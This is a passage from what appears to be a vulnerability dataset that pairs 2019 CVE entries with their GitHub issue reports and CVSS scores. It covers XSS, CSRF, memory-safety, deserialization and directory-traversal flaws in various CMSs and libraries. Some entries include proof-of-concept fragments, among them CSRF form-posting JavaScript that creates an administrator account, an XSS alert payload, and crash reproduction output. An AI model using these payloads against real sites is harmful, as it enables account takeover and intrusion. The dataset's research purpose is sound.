  45001. "description": "wuzhicms NUMBERTAG baidumap reflected xss vulnerability. A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the x or y parameter of APITAG Vulnerability file: APITAG ERRORTAG APITAG APITAG FILETAG FILETAG",
  45002. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45003. "severity": "MEDIUM",
  45004. "baseScore": 6.1,
  45005. "impactScore": 2.7,
  45006. "exploitabilityScore": 2.8
  45007. },
  45008. {
  45009. "CVE_ID": "CVE-2019-9110",
  45010. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/170",
  45011. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/170",
  45012. "Repo_new": "wuzhicms/wuzhicms",
  45013. "Issue_Created_At": "2019-02-14T03:05:39Z",
  45014. "description": "wuzhicms NUMBERTAG set_iframe reflected xss vulnerability. A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the set_iframe parameter of APITAG Vulnerability file: APITAG ERRORTAG APITAG APITAG Triggered when the user was logged in without verified email address: FILETAG",
  45015. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45016. "severity": "MEDIUM",
  45017. "baseScore": 6.1,
  45018. "impactScore": 2.7,
  45019. "exploitabilityScore": 2.8
  45020. },
  45021. {
  45022. "CVE_ID": "CVE-2019-9113",
  45023. "Issue_Url_old": "https://github.com/libming/libming/issues/171",
  45024. "Issue_Url_new": "https://github.com/libming/libming/issues/171",
  45025. "Repo_new": "libming/libming",
  45026. "Issue_Created_At": "2019-01-02T06:33:17Z",
  45027. "description": "Null pointer dereference in APITAG (decompile.c NUMBERTAG A null pointer dereference was found in function APITAG (decompile.c line NUMBERTAG Details is as below: ERRORTAG poc file : URLTAG Reproduce it using: APITAG credit: APITAG of Venustech",
  45028. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45029. "severity": "HIGH",
  45030. "baseScore": 8.8,
  45031. "impactScore": 5.9,
  45032. "exploitabilityScore": 2.8
  45033. },
  45034. {
  45035. "CVE_ID": "CVE-2019-9115",
  45036. "Issue_Url_old": "https://github.com/irisnet/irisnet-crypto/issues/60",
  45037. "Issue_Url_new": "https://github.com/irisnet/irisnet-crypto/issues/60",
  45038. "Repo_new": "irisnet/irisnet-crypto",
  45039. "Issue_Created_At": "2019-01-16T11:32:46Z",
  45040. "description": "NUMBERTAG In the FILETAG file line NUMBERTAG eval maybe execute malice code\uff0c",
  45041. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45042. "severity": "CRITICAL",
  45043. "baseScore": 9.8,
  45044. "impactScore": 5.9,
  45045. "exploitabilityScore": 3.9
  45046. },
  45047. {
  45048. "CVE_ID": "CVE-2019-9142",
  45049. "Issue_Url_old": "https://github.com/b3log/symphony/issues/860",
  45050. "Issue_Url_new": "https://github.com/b3log/symphony/issues/860",
  45051. "Repo_new": "b3log/symphony",
  45052. "Issue_Created_At": "2019-01-23T11:12:10Z",
  45053. "description": "Stored Cross Site Scripting(XSS) vulnerability. APITAG NUMBERTAG",
  45054. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45055. "severity": "MEDIUM",
  45056. "baseScore": 6.1,
  45057. "impactScore": 2.7,
  45058. "exploitabilityScore": 2.8
  45059. },
  45060. {
  45061. "CVE_ID": "CVE-2019-9143",
  45062. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/711",
  45063. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/711",
  45064. "Repo_new": "exiv2/exiv2",
  45065. "Issue_Created_At": "2019-02-21T11:50:59Z",
  45066. "description": "uncontrolled recursion loop in APITAG Description During our research ,we Observed that an infinite uncontrolled recursion loop, at function APITAG at file image.cpp . It allows an attacker to cause Denial of Service or possibly have unspecified other impact. Command APITAG POC REPRODUCER URLTAG Debug GDB CODETAG",
  45067. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45068. "severity": "HIGH",
  45069. "baseScore": 8.8,
  45070. "impactScore": 5.9,
  45071. "exploitabilityScore": 2.8
  45072. },
  45073. {
  45074. "CVE_ID": "CVE-2019-9144",
  45075. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/712",
  45076. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/712",
  45077. "Repo_new": "exiv2/exiv2",
  45078. "Issue_Created_At": "2019-02-21T11:57:14Z",
  45079. "description": "Uncontrolled recursion loop in Exi NUMBERTAG anonymous APITAG ) . Description During our research ,we Observed that an infinite uncontrolled recursion loop, at function APITAG ) located in APITAG . It allows an attacker to cause Denial of Service or possibly have unspecified other impact. Command exi NUMBERTAG b u k p R pr $POC POC REPRODUCER URLTAG Debug GDB ERRORTAG",
  45080. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45081. "severity": "HIGH",
  45082. "baseScore": 8.8,
  45083. "impactScore": 5.9,
  45084. "exploitabilityScore": 2.8
  45085. },
  45086. {
  45087. "CVE_ID": "CVE-2019-9212",
  45088. "Issue_Url_old": "https://github.com/alipay/sofa-hessian/issues/34",
  45089. "Issue_Url_new": "https://github.com/sofastack/sofa-hessian/issues/34",
  45090. "Repo_new": "sofastack/sofa-hessian",
  45091. "Issue_Created_At": "2019-02-24T00:30:09Z",
  45092. "description": "hessian deserialization blacklist bypass . URLTAG url that sofa hessian prevent deserialization by maintaining blacklists. However, the blacklist does not add APITAG and APITAG and there are cases where it continues to be utilized. Take the following poc as an example: URLTAG url",
  45093. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45094. "severity": "CRITICAL",
  45095. "baseScore": 9.8,
  45096. "impactScore": 5.9,
  45097. "exploitabilityScore": 3.9
  45098. },
  45099. {
  45100. "CVE_ID": "CVE-2019-9226",
  45101. "Issue_Url_old": "https://github.com/baigoStudio/baigoCMS/issues/7",
  45102. "Issue_Url_new": "https://github.com/baigostudio/baigocms/issues/7",
  45103. "Repo_new": "baigostudio/baigocms",
  45104. "Issue_Created_At": "2019-02-28T08:43:59Z",
  45105. "description": "There is a stored XSS vulnerability. Vulnerability description A xss vulnerability was discovered in APITAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form(opt FILETAG FILETAG FILETAG FILETAG",
  45106. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45107. "severity": "MEDIUM",
  45108. "baseScore": 6.1,
  45109. "impactScore": 2.7,
  45110. "exploitabilityScore": 2.8
  45111. },
  45112. {
  45113. "CVE_ID": "CVE-2019-9227",
  45114. "Issue_Url_old": "https://github.com/baigoStudio/baigoCMS/issues/8",
  45115. "Issue_Url_new": "https://github.com/baigostudio/baigocms/issues/8",
  45116. "Repo_new": "baigostudio/baigocms",
  45117. "Issue_Created_At": "2019-02-28T09:49:16Z",
  45118. "description": "There is an Arbitrary Content Injection vulnerability leading to Code Execution . Vulnerability description There is a vulnerability which allows remote attackers to execute arbitrary code. The 'BG_SITE_NAME' parameter which includes malicious code can be written into APITAG poc APITAG FILETAG FILETAG FILETAG",
  45119. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45120. "severity": "CRITICAL",
  45121. "baseScore": 9.8,
  45122. "impactScore": 5.9,
  45123. "exploitabilityScore": 3.9
  45124. },
  45125. {
  45126. "CVE_ID": "CVE-2019-9278",
  45127. "Issue_Url_old": "https://github.com/libexif/libexif/issues/26",
  45128. "Issue_Url_new": "https://github.com/libexif/libexif/issues/26",
  45129. "Repo_new": "libexif/libexif",
  45130. "Issue_Created_At": "2019-11-11T13:46:03Z",
  45131. "description": "Relevant commit for CVETAG . As the CVE quotes, > In libexif, there is a possible out of bounds write due to an integer overflow. This could lead to remote escalation of privilege in the media content provider with no additional execution privileges needed. User interaction is needed for exploitation. Do we have a fix for it yet? Relevant bug report at Debian Security Tracker: URLTAG",
  45132. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45133. "severity": "HIGH",
  45134. "baseScore": 8.8,
  45135. "impactScore": 5.9,
  45136. "exploitabilityScore": 2.8
  45137. },
  45138. {
  45139. "CVE_ID": "CVE-2019-9544",
  45140. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/374",
  45141. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/374",
  45142. "Repo_new": "axiomatic-systems/bento4",
  45143. "Issue_Created_At": "2019-02-28T15:32:28Z",
  45144. "description": "Out of bound write in APITAG Description we observed a Out of bound write occured in function APITAG located in APITAG same be triggered by sending a crafted file to the FILETAG (windows)] [mp NUMBERTAG hls(ubuntu)] binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command in linux mp NUMBERTAG hls hls version NUMBERTAG pmt pid NUMBERTAG ideo pid NUMBERTAG ideo track id NUMBERTAG segment duration NUMBERTAG segment duration threshold NUMBERTAG pcr offset NUMBERTAG index filename APITAG segment filename template stream.mp4 output single file $POC Command in windows mp NUMBERTAG hls.exe hls version NUMBERTAG pmt pid NUMBERTAG ideo pid NUMBERTAG ideo track id NUMBERTAG segment duration NUMBERTAG segment duration threshold NUMBERTAG pcr offset NUMBERTAG index filename APITAG segment filename template stream.mp4 output single file $POC POC [REPRODUCER URLTAG Degub ASAN REPORT ~~~ ASAN report: WARNING: forcing version to NUMBERTAG in order to support single file output APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG d NUMBERTAG at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG bfffd NUMBERTAG sp NUMBERTAG bfffcff8 WRITE of size NUMBERTAG at NUMBERTAG b NUMBERTAG d NUMBERTAG thread T NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG int) PATHTAG NUMBERTAG in APITAG int, unsigned char, unsigned int, APITAG PATHTAG NUMBERTAG aa in APITAG int, APITAG PATHTAG NUMBERTAG e9a in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ee in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG c NUMBERTAG f in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG c NUMBERTAG a1 in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG c2c NUMBERTAG in APITAG int, unsigned long long, bool, bool, APITAG APITAG PATHTAG NUMBERTAG d0 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ee in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG c NUMBERTAG f in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG c NUMBERTAG a1 in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG c2c NUMBERTAG in APITAG int, unsigned long long, bool, bool, APITAG APITAG PATHTAG NUMBERTAG d0 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG a NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ~~~ GDB ~~~ PATHTAG NUMBERTAG APITAG result = APITAG NUMBERTAG if (AP4_FAILED(result)) return result NUMBERTAG construct the new items NUMBERTAG for (unsigned int APITAG i APITAG APITAG item_count NUMBERTAG d NUMBERTAG APITAG size NUMBERTAG c, version NUMBERTAG flags NUMBERTAG stream= APITAG NUMBERTAG bf5 \u2192 APITAG stream= APITAG NUMBERTAG f NUMBERTAG da \u2192 APITAG stream= MENTIONTAG type NUMBERTAG size NUMBERTAG c, size NUMBERTAG c, atom= APITAG NUMBERTAG f NUMBERTAG a \u2192 APITAG stream= MENTIONTAG bytes_available= MENTIONTAG atom= APITAG NUMBERTAG a4cd5 \u2192 APITAG atom_factory= MENTIONTAG stream= MENTIONTAG size NUMBERTAG a NUMBERTAG a4a NUMBERTAG APITAG type NUMBERTAG c, size NUMBERTAG a NUMBERTAG force NUMBERTAG stream= MENTIONTAG atom_factory= APITAG NUMBERTAG a NUMBERTAG e5 \u2192 APITAG size NUMBERTAG a NUMBERTAG is_full NUMBERTAG force NUMBERTAG stream= MENTIONTAG atom_factory= APITAG NUMBERTAG f5bbf \u2192 APITAG stream= MENTIONTAG type NUMBERTAG c, size NUMBERTAG a NUMBERTAG size NUMBERTAG a NUMBERTAG atom= APITAG NUMBERTAG f NUMBERTAG a \u2192 APITAG stream= MENTIONTAG bytes_available= MENTIONTAG atom= APITAG APITAG gef\u27a4 p/d entry_count NUMBERTAG gef\u27a4 p/d item_count NUMBERTAG gef\u27a4 ptype i type = unsigned int gef\u27a4 p/d i NUMBERTAG gef\u27a4 p/d APITAG NUMBERTAG gef\u27a4 ptype APITAG type = class APITAG { public: AP4_UI NUMBERTAG APITAG AP4_UI NUMBERTAG APITAG APITAG APITAG AP4_UI NUMBERTAG gef\u27a4 x APITAG Cannot access memory at address NUMBERTAG gef\u27a4 p APITAG Cannot access memory at address NUMBERTAG gef\u27a4 i r ea NUMBERTAG ec NUMBERTAG b7df NUMBERTAG b7df NUMBERTAG ed NUMBERTAG e NUMBERTAG e NUMBERTAG eb NUMBERTAG ac NUMBERTAG ac NUMBERTAG esp NUMBERTAG bfffe NUMBERTAG bfffe NUMBERTAG ebp NUMBERTAG bfffe NUMBERTAG bfffe NUMBERTAG esi NUMBERTAG c NUMBERTAG c NUMBERTAG edi NUMBERTAG b7df NUMBERTAG b7df NUMBERTAG eip NUMBERTAG ef NUMBERTAG ef NUMBERTAG APITAG eflags NUMBERTAG AF SF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG b ds NUMBERTAG b NUMBERTAG b es NUMBERTAG b NUMBERTAG b fs NUMBERTAG gs NUMBERTAG DEBUG ON WINDOWS ~~~ STACK_TEXT NUMBERTAG be NUMBERTAG d6b2d NUMBERTAG f NUMBERTAG APITAG NUMBERTAG be NUMBERTAG c NUMBERTAG d NUMBERTAG e NUMBERTAG e NUMBERTAG be NUMBERTAG APITAG NUMBERTAG be7bc NUMBERTAG d NUMBERTAG b NUMBERTAG c NUMBERTAG APITAG NUMBERTAG be NUMBERTAG a1fb NUMBERTAG c NUMBERTAG f APITAG NUMBERTAG be NUMBERTAG a NUMBERTAG dd NUMBERTAG c NUMBERTAG APITAG NUMBERTAG be9e NUMBERTAG ae0b NUMBERTAG bea NUMBERTAG bea NUMBERTAG APITAG FAILURE_BUCKET_ID: APITAG BUCKET_ID: APITAG APITAG c NUMBERTAG APITAG violation) FAULTING_SOURCE_FILE: PATHTAG FAILURE_FUNCTION_NAME: APITAG Registers: ea NUMBERTAG f NUMBERTAG eb NUMBERTAG efde NUMBERTAG ec NUMBERTAG f NUMBERTAG ed NUMBERTAG esi NUMBERTAG be NUMBERTAG edi NUMBERTAG be7b0 eip NUMBERTAG d NUMBERTAG f1 esp NUMBERTAG be NUMBERTAG c ebp NUMBERTAG be NUMBERTAG iopl NUMBERTAG nv up ei pl nz na po nc cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG b es NUMBERTAG b fs NUMBERTAG gs NUMBERTAG b efl NUMBERTAG",
  45145. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45146. "severity": "HIGH",
  45147. "baseScore": 8.8,
  45148. "impactScore": 5.9,
  45149. "exploitabilityScore": 2.8
  45150. },
  45151. {
  45152. "CVE_ID": "CVE-2019-9549",
  45153. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/17",
  45154. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/17",
  45155. "Repo_new": "popojicms/popojicms",
  45156. "Issue_Created_At": "2019-03-02T15:46:46Z",
  45157. "description": "I found a CSRF vulnerability. POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG APITAG Write a POST script FILETAG APITAG APITAG APITAG function post(url,fields) { var p APITAG p.action= url; p.method=\"POST\"; p.target=\"_self\"; APITAG = fields; APITAG APITAG } function APITAG { var fields; fields += \" APITAG \"; fields += \" APITAG \"; fields += \" APITAG \"; fields += \" APITAG \"; var url=\" FILETAG PATHTAG post(url,fields); } APITAG = APITAG { APITAG APITAG APITAG APITAG Sent to the site owner, he created an administrator account by opening the link FILETAG",
  45158. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45159. "severity": "HIGH",
  45160. "baseScore": 8.8,
  45161. "impactScore": 5.9,
  45162. "exploitabilityScore": 2.8
  45163. },
  45164. {
  45165. "CVE_ID": "CVE-2019-9550",
  45166. "Issue_Url_old": "https://github.com/ShaoGongBra/dhcms/issues/1",
  45167. "Issue_Url_new": "https://github.com/shaogongbra/dhcms/issues/1",
  45168. "Repo_new": "shaogongbra/dhcms",
  45169. "Issue_Created_At": "2019-03-02T05:03:09Z",
  45170. "description": "Dhcms Stored XSS APITAG Privilege). Holes for details: APITAG the backstage: URLTAG APITAG form FILETAG APITAG FILETAG and input:\"> APITAG APITAG you can accept cookie information FILETAG",
  45171. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  45172. "severity": "MEDIUM",
  45173. "baseScore": 4.8,
  45174. "impactScore": 2.7,
  45175. "exploitabilityScore": 1.7
  45176. },
  45177. {
  45178. "CVE_ID": "CVE-2019-9551",
  45179. "Issue_Url_old": "https://github.com/millken/doyocms/issues/2",
  45180. "Issue_Url_new": "https://github.com/millken/doyocms/issues/2",
  45181. "Repo_new": "millken/doyocms",
  45182. "Issue_Created_At": "2019-03-02T03:44:48Z",
  45183. "description": "Stored XSS APITAG Privilege). Holes for details: APITAG the backstage: FILETAG APITAG article APITAG editor FILETAG APITAG APITAG APITAG FILETAG FILETAG",
  45184. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  45185. "severity": "MEDIUM",
  45186. "baseScore": 4.8,
  45187. "impactScore": 2.7,
  45188. "exploitabilityScore": 1.7
  45189. },
  45190. {
  45191. "CVE_ID": "CVE-2019-9552",
  45192. "Issue_Url_old": "https://github.com/lmy1342554547/p2pProject/issues/1",
  45193. "Issue_Url_new": "https://github.com/lmy1342554547/p2pproject/issues/1",
  45194. "Repo_new": "lmy1342554547/p2pProject",
  45195. "Issue_Created_At": "2019-03-02T02:56:30Z",
  45196. "description": "APITAG P2P directory traversal vulnerabilities. Holes for details: APITAG P2P directory traversal vulnerabilities\uff0c Directory traversal (arbitrary files download) hole is different from the site directory browsing, the vulnerability is not only can traverse the web under the system files, and you can browse or download the files in the system, the attack people through directory traversal attacks can access to system files and server configuration files, and so on. In general, they use the server API, standard file permissions. Strictly speaking, directory traversal attack is not a web vulnerability, but web designers design \"holes\". If a web designer to design the web content, does not have the proper access control allows HTTP traversal, the attacker can access restricted directories, and can execute commands outside the web root directory. Vulnerability screenshots\uff1a URL: URLTAG URLTAG URLTAG FILETAG FILETAG",
  45197. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45198. "severity": "CRITICAL",
  45199. "baseScore": 9.8,
  45200. "impactScore": 5.9,
  45201. "exploitabilityScore": 3.9
  45202. },
  45203. {
  45204. "CVE_ID": "CVE-2019-9570",
  45205. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/11",
  45206. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/11",
  45207. "Repo_new": "yzmcms/yzmcms",
  45208. "Issue_Created_At": "2019-03-05T06:59:56Z",
  45209. "description": "Bug: APITAG NUMBERTAG SS. Hi, I would like to report Cross Site Scripting vulnerability in APITAG NUMBERTAG POC: APITAG to administrator panel. APITAG below URL in browser which supports flash. url: URLTAG eg: APITAG alert('xss2') APITAG FILETAG FILETAG Fix: Filter the site_code parameter",
  45210. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  45211. "severity": "MEDIUM",
  45212. "baseScore": 4.8,
  45213. "impactScore": 2.7,
  45214. "exploitabilityScore": 1.7
  45215. },
  45216. {
  45217. "CVE_ID": "CVE-2019-9572",
  45218. "Issue_Url_old": "https://github.com/PearlyNautilus/Security-Code-Review/issues/3",
  45219. "Issue_Url_new": "https://github.com/pearlynautilus/security-code-review/issues/3",
  45220. "Repo_new": "PearlyNautilus/Security-Code-Review",
  45221. "Issue_Created_At": "2019-03-05T08:03:15Z",
  45222. "description": "APITAG There is another file upload vulnerability on upload Theme, APITAG NUMBERTAG APITAG Product APITAG URLTAG Show case: FILETAG Edit a php file with special name FILETAG Transform it to a zip file like this FILETAG Theme file uploading... FILETAG We can find it from backstage processes. \\schoolcms PATHTAG line NUMBERTAG function APITAG FILETAG FILETAG With function APITAG FILETAG that we uploaded save in a specified location: \\schoolcms PATHTAG FILETAG FILETAG",
  45223. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  45224. "severity": "HIGH",
  45225. "baseScore": 7.2,
  45226. "impactScore": 5.9,
  45227. "exploitabilityScore": 1.2
  45228. },
  45229. {
  45230. "CVE_ID": "CVE-2019-9594",
  45231. "Issue_Url_old": "https://github.com/8test/pentest/issues/1",
  45232. "Issue_Url_new": "https://github.com/8test/pentest/issues/1",
  45233. "Repo_new": "8test/pentest",
  45234. "Issue_Created_At": "2019-03-06T07:52:07Z",
  45235. "description": "audit of bluecms. FILETAG",
  45236. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45237. "severity": "CRITICAL",
  45238. "baseScore": 9.8,
  45239. "impactScore": 5.9,
  45240. "exploitabilityScore": 3.9
  45241. },
  45242. {
  45243. "CVE_ID": "CVE-2019-9595",
  45244. "Issue_Url_old": "https://github.com/source-trace/appcms/issues/1",
  45245. "Issue_Url_new": "https://github.com/source-trace/appcms/issues/1",
  45246. "Repo_new": "source-trace/appcms",
  45247. "Issue_Created_At": "2019-03-06T12:48:58Z",
  45248. "description": "XSS injection vulnerability exists in FILETAG . callback.php CODETAG $params not filtered so we can use APITAG APITAG FILETAG",
  45249. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45250. "severity": "MEDIUM",
  45251. "baseScore": 6.1,
  45252. "impactScore": 2.7,
  45253. "exploitabilityScore": 2.8
  45254. },
  45255. {
  45256. "CVE_ID": "CVE-2019-9598",
  45257. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/4",
  45258. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/4",
  45259. "Repo_new": "chshcms/cscms",
  45260. "Issue_Created_At": "2019-03-06T09:20:08Z",
  45261. "description": "Bug: APITAG NUMBERTAG CSRF. Hi, I would like to report CSRF vulnerability APITAG NUMBERTAG There is a CSRF vulnerability that can change of payment account to steal property POC: APITAG to administrator panel. APITAG below URL in browser which supports flash. url: URLTAG eg: APITAG modification FILETAG NUMBERTAG CSRF POC APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG modification FILETAG",
  45262. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  45263. "severity": "MEDIUM",
  45264. "baseScore": 6.5,
  45265. "impactScore": 3.6,
  45266. "exploitabilityScore": 2.8
  45267. },
  45268. {
  45269. "CVE_ID": "CVE-2019-9603",
  45270. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/29",
  45271. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/29",
  45272. "Repo_new": "bg5sbk/minicms",
  45273. "Issue_Created_At": "2019-03-06T08:43:27Z",
  45274. "description": "I found a CSRF vulnerability. One: use CSRF vulnerability to delete article Vulnerability details: When the administrator logs in, opening the webpage will automatically delete the specified article. Vulnerability url: FILETAG Vulnerability POC: APITAG",
  45275. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  45276. "severity": "MEDIUM",
  45277. "baseScore": 6.5,
  45278. "impactScore": 3.6,
  45279. "exploitabilityScore": 2.8
  45280. },
  45281. {
  45282. "CVE_ID": "CVE-2019-9634",
  45283. "Issue_Url_old": "https://github.com/golang/go/issues/30642",
  45284. "Issue_Url_new": "https://github.com/golang/go/issues/30642",
  45285. "Repo_new": "golang/go",
  45286. "Issue_Created_At": "2019-03-06T21:00:30Z",
  45287. "description": "runtime: dll injection vulnerabilities on Windows. MENTIONTAG suggested I open an issue for this rather than merely pushing fixes up to gerrit, so that we can track this for a NUMBERTAG point release. This runtime PR cleans up some APITAG usage: URLTAG And this x/sys PR makes the fallback there more reliable: URLTAG The goal is that everywhere APITAG preferred, but when not possible, APITAG is called only with either an absolute path computed properly with APITAG or with the exact string APITAG . I haven't yet dynamically traced the exes yet to verify I've whacked them all now, but hopefully I or someone else can get that done before this issue is closed.",
  45288. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45289. "severity": "HIGH",
  45290. "baseScore": 7.8,
  45291. "impactScore": 5.9,
  45292. "exploitabilityScore": 1.8
  45293. },
  45294. {
  45295. "CVE_ID": "CVE-2019-9656",
  45296. "Issue_Url_old": "https://github.com/libofx/libofx/issues/22",
  45297. "Issue_Url_new": "https://github.com/libofx/libofx/issues/22",
  45298. "Repo_new": "libofx/libofx",
  45299. "Issue_Created_At": "2019-03-06T06:59:42Z",
  45300. "description": "a null pointer derefrence problem in function APITAG const&) in file APITAG The report and the poc to reproduce the bug can be found at here URLTAG .",
  45301. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45302. "severity": "HIGH",
  45303. "baseScore": 8.8,
  45304. "impactScore": 5.9,
  45305. "exploitabilityScore": 2.8
  45306. },
  45307. {
  45308. "CVE_ID": "CVE-2019-9658",
  45309. "Issue_Url_old": "https://github.com/checkstyle/checkstyle/issues/6478",
  45310. "Issue_Url_new": "https://github.com/checkstyle/checkstyle/issues/6478",
  45311. "Repo_new": "checkstyle/checkstyle",
  45312. "Issue_Created_At": "2019-02-25T03:28:30Z",
  45313. "description": "Remove DTDs from FILETAG location on FILETAG is not secure. All checkstyle version below NUMBERTAG are not very secure, see details",
  45314. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  45315. "severity": "MEDIUM",
  45316. "baseScore": 5.3,
  45317. "impactScore": 1.4,
  45318. "exploitabilityScore": 3.9
  45319. },
  45320. {
  45321. "CVE_ID": "CVE-2019-9658",
  45322. "Issue_Url_old": "https://github.com/checkstyle/checkstyle/issues/6474",
  45323. "Issue_Url_new": "https://github.com/checkstyle/checkstyle/issues/6474",
  45324. "Repo_new": "checkstyle/checkstyle",
  45325. "Issue_Created_At": "2019-02-24T15:42:58Z",
  45326. "description": "Disable loading external DTDs by default, create system property to activate it. Ability to load external DTDs is considered as security issue, especially if DTDs are not hosted on https hosting. Checkstyle use to rely on remote DTD files previously so such ability was enabled by default. Old",
  45327. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  45328. "severity": "MEDIUM",
  45329. "baseScore": 5.3,
  45330. "impactScore": 1.4,
  45331. "exploitabilityScore": 3.9
  45332. },
  45333. {
  45334. "CVE_ID": "CVE-2019-9660",
  45335. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/12",
  45336. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/12",
  45337. "Repo_new": "yzmcms/yzmcms",
  45338. "Issue_Created_At": "2019-03-09T01:29:50Z",
